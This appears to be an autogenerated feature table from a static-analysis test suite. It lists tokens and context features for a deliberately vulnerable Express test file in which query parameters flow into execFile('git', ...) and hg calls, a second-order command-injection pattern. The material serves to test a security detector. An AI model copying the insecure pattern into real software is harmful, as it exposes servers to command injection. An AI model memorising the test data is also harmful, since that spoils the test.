autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:22:24:32 | "ls-remote" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:22:24:32 | "ls-remote" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:22:24:32 | "ls-remote" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:35:24:40 | remote | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:35:24:40 | remote | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:35:24:40 | remote | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:35:24:40 | remote | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:35:24:40 | remote | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:35:24:40 | remote | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:35:24:40 | remote | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:35:24:40 | remote | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:35:24:40 | remote | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:35:24:40 | remote | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:43:24:48 | "HEAD" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:43:24:48 | "HEAD" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:43:24:48 | "HEAD" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:43:24:48 | "HEAD" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:43:24:48 | "HEAD" | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:43:24:48 | "HEAD" | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:43:24:48 | "HEAD" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:43:24:48 | "HEAD" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:43:24:48 | "HEAD" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:24:43:24:48 | "HEAD" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:5:26:12 | execFile | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:5:26:12 | execFile | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:5:26:12 | execFile | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:5:26:12 | execFile | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:5:26:12 | execFile | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:5:26:50 | exceptional return of execFil ... HEAD"]) | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:5:26:50 | exceptional return of execFil ... HEAD"]) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:5:26:50 | exceptional return of execFil ... HEAD"]) | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:5:26:50 | exceptional return of execFil ... HEAD"]) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:5:26:50 | exceptional return of execFil ... HEAD"]) | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:5:26:50 | execFil ... HEAD"]) | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:5:26:50 | execFil ... HEAD"]) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:5:26:50 | execFil ... HEAD"]) | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:5:26:50 | execFil ... HEAD"]) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:5:26:50 | execFil ... HEAD"]) | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:14:26:18 | "git" | CalleeFlexibleAccessPath | execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:14:26:18 | "git" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:14:26:18 | "git" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:14:26:18 | "git" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:14:26:18 | "git" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:14:26:18 | "git" | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:14:26:18 | "git" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:14:26:18 | "git" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:21:26:49 | ["ls-re ... "HEAD"] | CalleeFlexibleAccessPath | execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:21:26:49 | ["ls-re ... "HEAD"] | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:21:26:49 | ["ls-re ... "HEAD"] | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:21:26:49 | ["ls-re ... "HEAD"] | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:21:26:49 | ["ls-re ... "HEAD"] | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:21:26:49 | ["ls-re ... "HEAD"] | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:21:26:49 | ["ls-re ... "HEAD"] | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:21:26:49 | ["ls-re ... "HEAD"] | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:22:26:32 | "ls-remote" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:22:26:32 | "ls-remote" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:22:26:32 | "ls-remote" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:22:26:32 | "ls-remote" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:22:26:32 | "ls-remote" | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:22:26:32 | "ls-remote" | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:22:26:32 | "ls-remote" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:22:26:32 | "ls-remote" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:22:26:32 | "ls-remote" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:22:26:32 | "ls-remote" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:35:26:40 | remote | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:35:26:40 | remote | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:35:26:40 | remote | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:35:26:40 | remote | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:35:26:40 | remote | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:35:26:40 | remote | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:35:26:40 | remote | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:35:26:40 | remote | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:35:26:40 | remote | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:35:26:40 | remote | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:43:26:48 | "HEAD" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:43:26:48 | "HEAD" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:43:26:48 | "HEAD" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:43:26:48 | "HEAD" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:43:26:48 | "HEAD" | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:43:26:48 | "HEAD" | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:43:26:48 | "HEAD" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:43:26:48 | "HEAD" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:43:26:48 | "HEAD" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:43:26:48 | "HEAD" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:29:3:29:10 | execFile | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:29:3:29:10 | execFile | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:29:3:29:10 | execFile | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:29:3:29:10 | execFile | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:29:3:29:10 | execFile | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:29:3:29:33 | exceptional return of execFil ... y.args) | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:29:3:29:33 | exceptional return of execFil ... y.args) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:29:3:29:33 | exceptional return of execFil ... y.args) | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:29:3:29:33 | exceptional return of execFil ... y.args) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:29:3:29:33 | exceptional return of execFil ... y.args) | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:29:3:29:33 | execFil ... y.args) | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:29:3:29:33 | execFil ... y.args) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:29:3:29:33 | execFil ... y.args) | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:29:3:29:33 | execFil ... y.args) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:29:3:29:33 | execFil ... y.args) | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:29:12:29:16 | "git" | CalleeFlexibleAccessPath | execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:29:12:29:16 | "git" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:29:12:29:16 | "git" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:29:12:29:16 | "git" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:29:12:29:16 | "git" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:29:12:29:16 | "git" | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:29:12:29:16 | "git" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:29:12:29:16 | "git" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:29:19:29:21 | req | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:29:19:29:21 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:29:19:29:21 | req | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:29:19:29:21 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:29:19:29:21 | req | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:29:19:29:27 | req.query | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:29:19:29:27 | req.query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:29:19:29:27 | req.query | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:29:19:29:27 | req.query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:29:19:29:27 | req.query | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:29:19:29:32 | req.query.args | CalleeFlexibleAccessPath | execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:29:19:29:32 | req.query.args | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:29:19:29:32 | req.query.args | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:29:19:29:32 | req.query.args | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:29:19:29:32 | req.query.args | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:29:19:29:32 | req.query.args | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| 